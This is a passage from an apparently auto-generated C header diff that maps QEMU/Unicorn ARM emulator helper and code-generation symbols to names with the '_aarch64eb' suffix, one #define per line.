gen_helper_neon_unzip8_aarch64eb +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_aarch64eb +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_aarch64eb +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_aarch64eb +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_aarch64eb +#define gen_helper_neon_zip16 gen_helper_neon_zip16_aarch64eb +#define gen_helper_neon_zip8 gen_helper_neon_zip8_aarch64eb +#define gen_helper_pre_hvc gen_helper_pre_hvc_aarch64eb +#define gen_helper_pre_smc gen_helper_pre_smc_aarch64eb +#define gen_helper_qadd16 gen_helper_qadd16_aarch64eb +#define gen_helper_qadd8 gen_helper_qadd8_aarch64eb +#define gen_helper_qaddsubx gen_helper_qaddsubx_aarch64eb +#define gen_helper_qsub16 gen_helper_qsub16_aarch64eb +#define gen_helper_qsub8 gen_helper_qsub8_aarch64eb +#define gen_helper_qsubaddx gen_helper_qsubaddx_aarch64eb +#define gen_helper_rbit gen_helper_rbit_aarch64eb +#define gen_helper_recpe_f32 gen_helper_recpe_f32_aarch64eb +#define gen_helper_recpe_u32 gen_helper_recpe_u32_aarch64eb +#define gen_helper_recps_f32 gen_helper_recps_f32_aarch64eb +#define gen_helper_rintd gen_helper_rintd_aarch64eb +#define gen_helper_rintd_exact gen_helper_rintd_exact_aarch64eb +#define gen_helper_rints gen_helper_rints_aarch64eb +#define gen_helper_rints_exact gen_helper_rints_exact_aarch64eb +#define gen_helper_ror_cc gen_helper_ror_cc_aarch64eb +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_aarch64eb +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_aarch64eb +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_aarch64eb +#define gen_helper_sadd16 gen_helper_sadd16_aarch64eb +#define gen_helper_sadd8 gen_helper_sadd8_aarch64eb +#define gen_helper_saddsubx gen_helper_saddsubx_aarch64eb +#define gen_helper_sar_cc gen_helper_sar_cc_aarch64eb +#define gen_helper_sdiv gen_helper_sdiv_aarch64eb +#define gen_helper_sel_flags gen_helper_sel_flags_aarch64eb +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_aarch64eb +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_aarch64eb +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_aarch64eb +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_aarch64eb +#define gen_helper_set_rmode gen_helper_set_rmode_aarch64eb +#define gen_helper_set_user_reg gen_helper_set_user_reg_aarch64eb +#define gen_helper_shadd16 gen_helper_shadd16_aarch64eb +#define gen_helper_shadd8 gen_helper_shadd8_aarch64eb +#define gen_helper_shaddsubx gen_helper_shaddsubx_aarch64eb +#define gen_helper_shl_cc gen_helper_shl_cc_aarch64eb +#define gen_helper_shr_cc gen_helper_shr_cc_aarch64eb +#define gen_helper_shsub16 gen_helper_shsub16_aarch64eb +#define gen_helper_shsub8 gen_helper_shsub8_aarch64eb +#define gen_helper_shsubaddx gen_helper_shsubaddx_aarch64eb +#define gen_helper_ssat gen_helper_ssat_aarch64eb +#define gen_helper_ssat16 gen_helper_ssat16_aarch64eb +#define gen_helper_ssub16 gen_helper_ssub16_aarch64eb +#define gen_helper_ssub8 gen_helper_ssub8_aarch64eb +#define gen_helper_ssubaddx gen_helper_ssubaddx_aarch64eb +#define gen_helper_sub_saturate gen_helper_sub_saturate_aarch64eb +#define gen_helper_sxtb16 gen_helper_sxtb16_aarch64eb +#define gen_helper_uadd16 gen_helper_uadd16_aarch64eb +#define gen_helper_uadd8 gen_helper_uadd8_aarch64eb +#define gen_helper_uaddsubx gen_helper_uaddsubx_aarch64eb +#define gen_helper_udiv gen_helper_udiv_aarch64eb +#define gen_helper_uhadd16 gen_helper_uhadd16_aarch64eb +#define gen_helper_uhadd8 gen_helper_uhadd8_aarch64eb +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_aarch64eb +#define gen_helper_uhsub16 gen_helper_uhsub16_aarch64eb +#define gen_helper_uhsub8 gen_helper_uhsub8_aarch64eb +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_aarch64eb +#define gen_helper_uqadd16 gen_helper_uqadd16_aarch64eb +#define gen_helper_uqadd8 gen_helper_uqadd8_aarch64eb +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_aarch64eb +#define gen_helper_uqsub16 gen_helper_uqsub16_aarch64eb +#define gen_helper_uqsub8 gen_helper_uqsub8_aarch64eb +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_aarch64eb +#define gen_helper_usad8 gen_helper_usad8_aarch64eb +#define gen_helper_usat gen_helper_usat_aarch64eb +#define gen_helper_usat16 gen_helper_usat16_aarch64eb +#define gen_helper_usub16 gen_helper_usub16_aarch64eb +#define gen_helper_usub8 gen_helper_usub8_aarch64eb +#define gen_helper_usubaddx gen_helper_usubaddx_aarch64eb +#define gen_helper_uxtb16 gen_helper_uxtb16_aarch64eb +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_aarch64eb +#define gen_helper_v7m_msr gen_helper_v7m_msr_aarch64eb +#define gen_helper_vfp_absd gen_helper_vfp_absd_aarch64eb +#define gen_helper_vfp_abss gen_helper_vfp_abss_aarch64eb +#define gen_helper_vfp_addd gen_helper_vfp_addd_aarch64eb +#define gen_helper_vfp_adds gen_helper_vfp_adds_aarch64eb +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_aarch64eb +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_aarch64eb +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_aarch64eb +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_aarch64eb +#define gen_helper_vfp_divd gen_helper_vfp_divd_aarch64eb +#define gen_helper_vfp_divs gen_helper_vfp_divs_aarch64eb +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_aarch64eb +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_aarch64eb +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_aarch64eb +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_aarch64eb +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_aarch64eb +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_aarch64eb +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_aarch64eb +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_aarch64eb +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_aarch64eb +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_aarch64eb +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_aarch64eb +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_aarch64eb +#define gen_helper_vfp_mins gen_helper_vfp_mins_aarch64eb +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_aarch64eb +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_aarch64eb +#define gen_helper_vfp_muld gen_helper_vfp_muld_aarch64eb +#define gen_helper_vfp_muls gen_helper_vfp_muls_aarch64eb +#define gen_helper_vfp_negd gen_helper_vfp_negd_aarch64eb +#define gen_helper_vfp_negs gen_helper_vfp_negs_aarch64eb +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_aarch64eb +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_aarch64eb +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_aarch64eb +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_aarch64eb +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_aarch64eb +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_aarch64eb +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_aarch64eb +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_aarch64eb +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_aarch64eb +#define gen_helper_vfp_subd gen_helper_vfp_subd_aarch64eb +#define gen_helper_vfp_subs gen_helper_vfp_subs_aarch64eb +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_aarch64eb +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_aarch64eb +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_aarch64eb +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_aarch64eb +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_aarch64eb +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_aarch64eb +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_aarch64eb +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_aarch64eb +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_aarch64eb +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_aarch64eb +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_aarch64eb +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_aarch64eb +#define gen_helper_vfp_touid gen_helper_vfp_touid_aarch64eb +#define gen_helper_vfp_touis gen_helper_vfp_touis_aarch64eb +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_aarch64eb +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_aarch64eb +#define gen_helper_vfp_tould gen_helper_vfp_tould_aarch64eb +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_aarch64eb +#define gen_helper_vfp_touls gen_helper_vfp_touls_aarch64eb +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_aarch64eb +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_aarch64eb +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_aarch64eb +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_aarch64eb +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_aarch64eb +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_aarch64eb +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_aarch64eb +#define gen_helper_wfe gen_helper_wfe_aarch64eb +#define gen_helper_wfi gen_helper_wfi_aarch64eb +#define gen_hvc gen_hvc_aarch64eb +#define gen_intermediate_code_internal gen_intermediate_code_internal_aarch64eb +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_aarch64eb +#define gen_iwmmxt_address gen_iwmmxt_address_aarch64eb +#define gen_iwmmxt_shift gen_iwmmxt_shift_aarch64eb +#define gen_jmp gen_jmp_aarch64eb +#define gen_load_and_replicate gen_load_and_replicate_aarch64eb +#define gen_load_exclusive gen_load_exclusive_aarch64eb +#define gen_logic_CC gen_logic_CC_aarch64eb +#define gen_logicq_cc gen_logicq_cc_aarch64eb +#define gen_lookup_tb gen_lookup_tb_aarch64eb +#define gen_mov_F0_vreg gen_mov_F0_vreg_aarch64eb +#define gen_mov_F1_vreg gen_mov_F1_vreg_aarch64eb +#define gen_mov_vreg_F0 gen_mov_vreg_F0_aarch64eb +#define gen_muls_i64_i32 gen_muls_i64_i32_aarch64eb +#define gen_mulu_i64_i32 gen_mulu_i64_i32_aarch64eb +#define gen_mulxy gen_mulxy_aarch64eb +#define gen_neon_add gen_neon_add_aarch64eb +#define gen_neon_addl gen_neon_addl_aarch64eb +#define gen_neon_addl_saturate gen_neon_addl_saturate_aarch64eb +#define gen_neon_bsl gen_neon_bsl_aarch64eb +#define gen_neon_dup_high16 gen_neon_dup_high16_aarch64eb +#define gen_neon_dup_low16 gen_neon_dup_low16_aarch64eb +#define gen_neon_dup_u8 gen_neon_dup_u8_aarch64eb +#define gen_neon_mull gen_neon_mull_aarch64eb +#define gen_neon_narrow gen_neon_narrow_aarch64eb +#define gen_neon_narrow_op gen_neon_narrow_op_aarch64eb +#define gen_neon_narrow_sats gen_neon_narrow_sats_aarch64eb +#define gen_neon_narrow_satu gen_neon_narrow_satu_aarch64eb +#define gen_neon_negl gen_neon_negl_aarch64eb +#define gen_neon_rsb gen_neon_rsb_aarch64eb +#define gen_neon_shift_narrow gen_neon_shift_narrow_aarch64eb +#define gen_neon_subl gen_neon_subl_aarch64eb +#define gen_neon_trn_u16 gen_neon_trn_u16_aarch64eb +#define gen_neon_trn_u8 gen_neon_trn_u8_aarch64eb +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_aarch64eb +#define gen_neon_unzip gen_neon_unzip_aarch64eb +#define gen_neon_widen gen_neon_widen_aarch64eb +#define gen_neon_zip gen_neon_zip_aarch64eb +#define gen_new_label gen_new_label_aarch64eb +#define gen_nop_hint gen_nop_hint_aarch64eb +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_aarch64eb +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_aarch64eb +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_aarch64eb +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_aarch64eb +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_aarch64eb +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_aarch64eb +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_aarch64eb +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_aarch64eb +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_aarch64eb +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_aarch64eb +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_aarch64eb +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_aarch64eb +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_aarch64eb +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_aarch64eb +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_aarch64eb +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_aarch64eb +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_aarch64eb +#define gen_rev16 gen_rev16_aarch64eb +#define gen_revsh gen_revsh_aarch64eb +#define gen_rfe gen_rfe_aarch64eb +#define gen_sar gen_sar_aarch64eb +#define gen_sbc_CC gen_sbc_CC_aarch64eb +#define gen_sbfx gen_sbfx_aarch64eb +#define gen_set_CF_bit31 gen_set_CF_bit31_aarch64eb +#define gen_set_condexec gen_set_condexec_aarch64eb +#define gen_set_cpsr gen_set_cpsr_aarch64eb +#define gen_set_label gen_set_label_aarch64eb +#define gen_set_pc_im gen_set_pc_im_aarch64eb +#define gen_set_psr gen_set_psr_aarch64eb +#define gen_set_psr_im gen_set_psr_im_aarch64eb +#define gen_shl gen_shl_aarch64eb +#define gen_shr gen_shr_aarch64eb +#define gen_smc gen_smc_aarch64eb +#define gen_smul_dual gen_smul_dual_aarch64eb +#define gen_srs gen_srs_aarch64eb +#define gen_ss_advance gen_ss_advance_aarch64eb +#define gen_step_complete_exception gen_step_complete_exception_aarch64eb +#define gen_store_exclusive gen_store_exclusive_aarch64eb +#define gen_storeq_reg gen_storeq_reg_aarch64eb +#define gen_sub_carry gen_sub_carry_aarch64eb +#define gen_sub_CC gen_sub_CC_aarch64eb +#define gen_subq_msw gen_subq_msw_aarch64eb +#define gen_swap_half gen_swap_half_aarch64eb +#define gen_thumb2_data_op gen_thumb2_data_op_aarch64eb +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_aarch64eb +#define gen_ubfx gen_ubfx_aarch64eb +#define gen_vfp_abs gen_vfp_abs_aarch64eb +#define gen_vfp_add gen_vfp_add_aarch64eb +#define gen_vfp_cmp gen_vfp_cmp_aarch64eb +#define gen_vfp_cmpe gen_vfp_cmpe_aarch64eb +#define gen_vfp_div gen_vfp_div_aarch64eb +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_aarch64eb +#define gen_vfp_F1_mul gen_vfp_F1_mul_aarch64eb +#define gen_vfp_F1_neg gen_vfp_F1_neg_aarch64eb +#define gen_vfp_ld gen_vfp_ld_aarch64eb +#define gen_vfp_mrs gen_vfp_mrs_aarch64eb +#define gen_vfp_msr gen_vfp_msr_aarch64eb +#define gen_vfp_mul gen_vfp_mul_aarch64eb +#define gen_vfp_neg gen_vfp_neg_aarch64eb +#define gen_vfp_shto gen_vfp_shto_aarch64eb +#define gen_vfp_sito gen_vfp_sito_aarch64eb +#define gen_vfp_slto gen_vfp_slto_aarch64eb +#define gen_vfp_sqrt gen_vfp_sqrt_aarch64eb +#define gen_vfp_st gen_vfp_st_aarch64eb +#define gen_vfp_sub gen_vfp_sub_aarch64eb +#define gen_vfp_tosh gen_vfp_tosh_aarch64eb +#define gen_vfp_tosi gen_vfp_tosi_aarch64eb +#define gen_vfp_tosiz gen_vfp_tosiz_aarch64eb +#define gen_vfp_tosl gen_vfp_tosl_aarch64eb +#define gen_vfp_touh gen_vfp_touh_aarch64eb +#define gen_vfp_toui gen_vfp_toui_aarch64eb +#define gen_vfp_touiz gen_vfp_touiz_aarch64eb +#define gen_vfp_toul gen_vfp_toul_aarch64eb +#define gen_vfp_uhto gen_vfp_uhto_aarch64eb +#define gen_vfp_uito gen_vfp_uito_aarch64eb +#define gen_vfp_ulto gen_vfp_ulto_aarch64eb +#define get_arm_cp_reginfo get_arm_cp_reginfo_aarch64eb +#define get_clock get_clock_aarch64eb +#define get_clock_realtime get_clock_realtime_aarch64eb +#define get_constraint_priority get_constraint_priority_aarch64eb +#define get_float_exception_flags get_float_exception_flags_aarch64eb +#define get_float_rounding_mode get_float_rounding_mode_aarch64eb +#define get_fpstatus_ptr get_fpstatus_ptr_aarch64eb +#define get_level1_table_address get_level1_table_address_aarch64eb +#define get_mem_index get_mem_index_aarch64eb +#define get_next_param_value get_next_param_value_aarch64eb +#define get_opt_name get_opt_name_aarch64eb +#define get_opt_value get_opt_value_aarch64eb +#define get_page_addr_code get_page_addr_code_aarch64eb +#define get_param_value get_param_value_aarch64eb +#define get_phys_addr get_phys_addr_aarch64eb +#define get_phys_addr_lpae get_phys_addr_lpae_aarch64eb +#define get_phys_addr_mpu get_phys_addr_mpu_aarch64eb +#define get_phys_addr_v5 get_phys_addr_v5_aarch64eb +#define get_phys_addr_v6 get_phys_addr_v6_aarch64eb +#define get_system_memory get_system_memory_aarch64eb +#define get_ticks_per_sec get_ticks_per_sec_aarch64eb +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_aarch64eb +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__aarch64eb +#define gt_cntfrq_access gt_cntfrq_access_aarch64eb +#define gt_cnt_read gt_cnt_read_aarch64eb +#define gt_cnt_reset gt_cnt_reset_aarch64eb +#define gt_counter_access gt_counter_access_aarch64eb +#define gt_ctl_write gt_ctl_write_aarch64eb +#define gt_cval_write gt_cval_write_aarch64eb +#define gt_get_countervalue gt_get_countervalue_aarch64eb +#define gt_pct_access gt_pct_access_aarch64eb +#define gt_ptimer_access gt_ptimer_access_aarch64eb +#define gt_recalc_timer gt_recalc_timer_aarch64eb +#define gt_timer_access gt_timer_access_aarch64eb +#define gt_tval_read gt_tval_read_aarch64eb +#define gt_tval_write gt_tval_write_aarch64eb +#define gt_vct_access gt_vct_access_aarch64eb +#define gt_vtimer_access gt_vtimer_access_aarch64eb +#define guest_phys_blocks_free guest_phys_blocks_free_aarch64eb +#define guest_phys_blocks_init guest_phys_blocks_init_aarch64eb +#define handle_vcvt handle_vcvt_aarch64eb +#define handle_vminmaxnm handle_vminmaxnm_aarch64eb +#define handle_vrint handle_vrint_aarch64eb +#define handle_vsel handle_vsel_aarch64eb +#define has_help_option has_help_option_aarch64eb +#define have_bmi1 have_bmi1_aarch64eb +#define have_bmi2 have_bmi2_aarch64eb +#define hcr_write hcr_write_aarch64eb +#define helper_access_check_cp_reg helper_access_check_cp_reg_aarch64eb +#define helper_add_saturate helper_add_saturate_aarch64eb +#define helper_add_setq helper_add_setq_aarch64eb +#define helper_add_usaturate helper_add_usaturate_aarch64eb +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_aarch64eb +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_aarch64eb +#define helper_be_ldq_mmu helper_be_ldq_mmu_aarch64eb +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_aarch64eb +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_aarch64eb +#define helper_be_ldul_mmu helper_be_ldul_mmu_aarch64eb +#define helper_be_lduw_mmu helper_be_lduw_mmu_aarch64eb +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_aarch64eb +#define helper_be_stl_mmu helper_be_stl_mmu_aarch64eb +#define helper_be_stq_mmu helper_be_stq_mmu_aarch64eb +#define helper_be_stw_mmu helper_be_stw_mmu_aarch64eb +#define helper_clear_pstate_ss helper_clear_pstate_ss_aarch64eb +#define helper_clz_arm helper_clz_arm_aarch64eb +#define helper_cpsr_read helper_cpsr_read_aarch64eb +#define helper_cpsr_write helper_cpsr_write_aarch64eb +#define helper_crc32_arm helper_crc32_arm_aarch64eb +#define helper_crc32c helper_crc32c_aarch64eb +#define helper_crypto_aese helper_crypto_aese_aarch64eb +#define helper_crypto_aesmc helper_crypto_aesmc_aarch64eb +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_aarch64eb +#define helper_crypto_sha1h helper_crypto_sha1h_aarch64eb +#define helper_crypto_sha1su1 helper_crypto_sha1su1_aarch64eb +#define helper_crypto_sha256h helper_crypto_sha256h_aarch64eb +#define helper_crypto_sha256h2 helper_crypto_sha256h2_aarch64eb +#define helper_crypto_sha256su0 helper_crypto_sha256su0_aarch64eb +#define helper_crypto_sha256su1 helper_crypto_sha256su1_aarch64eb 